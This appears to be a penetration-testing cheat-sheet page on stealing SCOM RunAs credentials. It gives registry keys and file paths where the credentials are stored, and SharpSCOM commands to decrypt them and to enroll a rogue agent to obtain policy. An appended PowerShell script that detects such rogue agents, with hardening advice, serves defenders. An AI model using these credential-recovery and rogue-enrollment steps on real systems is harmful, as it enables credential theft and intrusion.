Deployment - SCOM
Microsoft SCOM (System Center Operations Manager) is a monitoring tool used to oversee the health and performance of servers, applications, and infrastructure in IT environments. It collects data from systems, generates alerts for issues, and provides dashboards and reports for administrators.
Tools
- breakfix/SharpSCOM - A C# utility for interacting with SCOM.
- nccgroup/SCOMDecrypt - SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers.
SCOM “RunAs” credentials
Recovery from SCOM database
The location of the SCOM database containing the RunAs credentials can be found by querying the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
Decrypt the credentials stored inside the SCOM management server database:
Recovery via Registry
The RunAs credentials are also stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\HealthService\Parameters\Management Groups\$MANAGEMENT_GROUP$\SSDB\SSIDs\.
Recovery via Policy File
Use DPAPI to decrypt the RunAs credential from the policy.
cat "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config"
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>
Recovery after enrolling a new agent
Requirements:
- Management group name, listed under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HealthService\Parameters\Management Groups\*
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom.domain.lab /hostname:fake1.domain.lab /outfile:C:\Users\admin\desktop\policy_new.xml
# After enrolling a new agent, the attacker can decrypt the policy
SharpSCOM.exe decryptpolicy /data:"DAEAAA<REDACTED>" /key:<RSAKeyValue><Modulus><REDACTED></D></RSAKeyValue>
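On the defensive side, the enrollment above only succeeds silently when the management group is set to approve manually installed agents automatically; the Security setting under Administration > Settings decides whether such an agent is rejected, held in Pending Management for review, or auto-approved. The following PowerShell is an added example (not code from the page or from SharpSCOM) that lists agents which look like the rogue enrollment shown: recently installed agents, agents whose hostname does not resolve in DNS (the page's example uses fake1.domain.lab), and agents still waiting in Pending Management. It assumes the Operations Manager PowerShell module is installed and that the agent objects expose DisplayName, InstallTime and PrimaryManagementServerName and the pending entries expose AgentName; check those names with Get-Member on your version. Resolve-DnsName comes from the DnsClient module.

```powershell
# Added example, not from the page or from SharpSCOM: flag agents that resemble
# a rogue enrollment. Assumptions: the OperationsManager module is installed;
# agent objects expose DisplayName, InstallTime and PrimaryManagementServerName;
# pending entries expose AgentName (verify with Get-Member on your version).
Import-Module OperationsManager -ErrorAction Stop

function Get-SuspiciousScomAgents {
    param(
        [Parameter(Mandatory)] [string] $ManagementServer,
        [int] $NewerThanHours = 24
    )
    New-SCOMManagementGroupConnection -ComputerName $ManagementServer
    $cutoff   = (Get-Date).AddHours(-$NewerThanHours)
    $findings = @()

    foreach ($agent in Get-SCOMAgent) {
        $reasons = @()

        # Recent installs: an agent nobody deployed is the first sign.
        if ($agent.InstallTime -gt $cutoff) { $reasons += "installed after $cutoff" }

        # Hostnames that do not resolve: a made-up name such as the page's
        # fake1.domain.lab is unknown to DNS.
        try   { $null = Resolve-DnsName -Name $agent.DisplayName -ErrorAction Stop }
        catch { $reasons += 'hostname does not resolve in DNS' }

        if ($reasons.Count -gt 0) {
            $findings += [pscustomobject]@{
                Agent            = $agent.DisplayName
                ManagementServer = $agent.PrimaryManagementServerName
                InstallTime      = $agent.InstallTime
                Reasons          = ($reasons -join '; ')
            }
        }
    }

    # Manually installed agents waiting for approval: review them instead of
    # switching the management group to automatic approval.
    foreach ($pending in Get-SCOMPendingManagement) {
        $findings += [pscustomobject]@{
            Agent            = $pending.AgentName
            ManagementServer = $ManagementServer
            InstallTime      = $null
            Reasons          = 'waiting in Pending Management'
        }
    }

    return $findings
}

# Usage: run from a host with the OperationsManager module, pointing at a
# management server; each row names an agent and why it was flagged.
Get-SuspiciousScomAgents -ManagementServer 'scom.domain.lab' | Format-Table -AutoSize
```

Keeping the Security setting at "Reject new manual agent installations" or at review-in-Pending-Management removes the silent path this section relies on; the script above then mainly serves to spot anything that slipped through before the setting was changed.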